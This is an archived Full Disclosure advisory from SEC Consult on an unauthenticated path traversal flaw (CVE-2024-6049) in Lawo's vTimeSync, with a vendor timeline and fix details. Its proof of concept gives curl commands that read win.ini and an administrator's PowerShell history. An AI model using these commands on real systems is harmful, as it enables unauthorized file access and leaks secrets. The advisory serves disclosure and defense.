lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <9f9e66c4-cf65-406a-aaf6-71c073eb8f53@sec-consult.com>
Date: Thu, 24 Oct 2024 07:03:29 +0000
From: SEC Consult Vulnerability Lab via Fulldisclosure
 <fulldisclosure@...lists.org>
To: "fulldisclosure@...lists.org" <fulldisclosure@...lists.org>
Subject: [FD] SEC Consult SA-20241024-0 :: Unauthenticated Path Traversal
 Vulnerability in Lawo AG - vsm LTC Time Sync (vTimeSync) (CVE-2024-6049)

SEC Consult Vulnerability Lab Security Advisory < 20241024-0 >
=======================================================================
               title: Unauthenticated Path Traversal Vulnerability
             product: Lawo AG - vsm LTC Time Sync (vTimeSync)
  vulnerable version: <4.5.6.0
       fixed version: 4.5.6.0
          CVE number: CVE-2024-6049
              impact: high
            homepage: https://docs.lawo.com/vsm-ip-broadcast-control-system/vsmgear-user-manual/discontinued-products/vsmltc
               found: 2024-01-11
                  by: Sandro Einfeldt
                      Dennis Jung
                      SEC Consult Vulnerability Lab

                      An integrated part of SEC Consult, an Eviden business
                      Europe | Asia

                      https://www.sec-consult.com

=======================================================================

Vendor description:
-------------------
"Lawo designs and manufactures video, audio, control and monitoring
technology for broadcast, performing arts, installed sound and corporate
applications. All products are developed in Germany and manufactured
according to highest quality standards at the company's headquarters
in the Rhine valley town of Rastatt, Germany."

Source: https://lawo.com/company/about-us/


Business recommendation:
------------------------
The vendor provides a patch which should be installed immediately.

SEC Consult highly recommends to perform a thorough security review of the product
conducted by security professionals to identify and resolve potential further
security issues.


Vulnerability overview/description:
-----------------------------------
1) Unauthenticated Path Traversal Vulnerability (CVE-2024-6049)
The web interface of vsm LTC Time Sync (vTimeSync) is vulnerable to a path
traversal vulnerability. By sending a specially crafted HTTP request, an
unauthenticated remote attacker can download arbitrary files from the vulnerable
system. As a limitation, the exploitation is only possible if the requested file
has a file extension, e.g. .exe or .txt.

The web server is running with highest SYSTEM privileges per default, which
enables an attacker to gain access to privileged files.


Proof of concept:
-----------------
1) Unauthenticated Path Traversal Vulnerability (CVE-2024-6049)
To exploit the vulnerability it is sufficient to use the following curl-command
to send a request to the vulnerable web server:

curl http://$host:8033/.../.../.../.../.../.../.../.../.../<Path to file>

For example, the following command can be used to request the default file
win.ini:

curl http://$host:8033/.../.../.../.../.../.../.../.../.../Windows/win.ini

If the application is running with SYSTEM-privileges (default), the following
command can be used to exfiltrate the Powershell history of the Windows
administrator, which might leak sensitive information:

curl http://$host:8033/.../.../.../.../.../.../.../.../.../Users/Administrator/AppData/Roaming/Microsoft/Windows/PowerShell/PSReadline/ConsoleHost_history.txt


Vulnerable / tested versions:
-----------------------------
The following version has been tested which was the latest version available
at the time of the test:
* 4.4.12.0

According to the vendor, versions before 4.5 are affected and v4.5.6.0
includes the fixes.


Vendor contact timeline:
------------------------
2024-01-22: Contacting vendor through info@...o.com; no response
2024-02-14: Contacting vendor again, adding support@...o.com email
2024-02-15: Vendor response (support), asking for details.
2024-02-15: Asking where to submit the advisory, whether encryption
             is supported.
2024-02-16: Vendor, submit either via email or JIRA; informing us
             that broadcasting software security levels are not that high
             as the network is usually not connected to the outside.
2024-02-16: Submitting security advisory to vendor JIRA; explaining
             our severity estimation and risks by exposing the affected
             service.
2024-02-20: Vendor has taken a look at the advisory, asking whether
             HTTPS would solve the issue.
             Telling vendor, that HTTPS won't fix the problem, describing
             the security issue again, providing link to OWASP path traversal
             page, etc.
2024-02-21: Vendor cannot reproduce issue in Chrome browser.
             Explaining how we exploited the vulnerability.
2024-03-11: Asking for a status update; no update from R&D yet, vendor will
             keep us updated.
2024-04-09: Asking for a status update, whether vendor needs further support.
2024-04-10: Vendor pinged their PM, will let us know as soon as feedback is
             available.
2024-05-15: Vendor recently introduced "a login" for vTimeSync which only
             lets people with a username and a PW access the page. Vendor asks
             us whether this would cover the vulnerability.
2024-05-23: Telling the vendor that a login does not fix the identified
             path traversal issue; no response.
2024-06-17: Asking for a status update again.
2024-06-17: Vendor support has forwarded our feedback internally.
2024-09-25: Asking for a status update, CVE and affected/fixed version number.
             Preparing for release in October.
2024-09-25: Vendor support still has no updates, asking product management and
             RnD team again.
2024-09-26: Asking the vendor to keep us informed.
2024-09-27: Vendor support will review the case next Wednesday.
2024-10-10: Asking for a status update.
             Vendor has no news, this topic is in the R&D backlog, no date yet
             when development will be started.
2024-10-11: Vendor states that the developers have already fixed the issue in
             the current release.
2024-10-17: Asking for the version numbers (affected / patched).
             Vendor provides download to version 4.5.6.0 including changelog.
             Changelog contains information about security fix in version 4.4.13,
             but also changes regarding SSL/HTTPS and logon feature in 4.5.0 and 4.5.1.
             Asking the vendor again, in which version the issue has been
             fixed.
             Vendor informs us the problem is fixed after v4.5 and we should use
             the latest version.
2024-10-21: Confirming version numbers, sending draft advisory to vendor and
             assigned CVE-2024-6049.
2024-10-24: Coordinated release of security advisory.


Solution:
---------
The vendor provides a patch in versions after v4.5 which can be downloaded from the
following URL, such as version 4.5.6.0.
https://lawo.com/lawo-downloads/


Workaround:
-----------
None


Advisory URL:
-------------
https://sec-consult.com/vulnerability-lab/


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab
An integrated part of SEC Consult, an Eviden business
Europe | Asia

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an
Eviden business. It ensures the continued knowledge gain of SEC Consult in the
field of network and application security to stay ahead of the attacker. The
SEC Consult Vulnerability Lab supports high-quality penetration testing and
the evaluation of new offensive and defensive technologies for our customers.
Hence our customers obtain the most current information about vulnerabilities
and valid recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://sec-consult.com/career/

Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://sec-consult.com/contact/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: security-research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: https://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

EOF Sandro Einfeldt, Dennis Jung, Johannes Greil / @2024

Download attachment "smime.p7s" of type "application/pkcs7-signature" (4201 bytes)

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ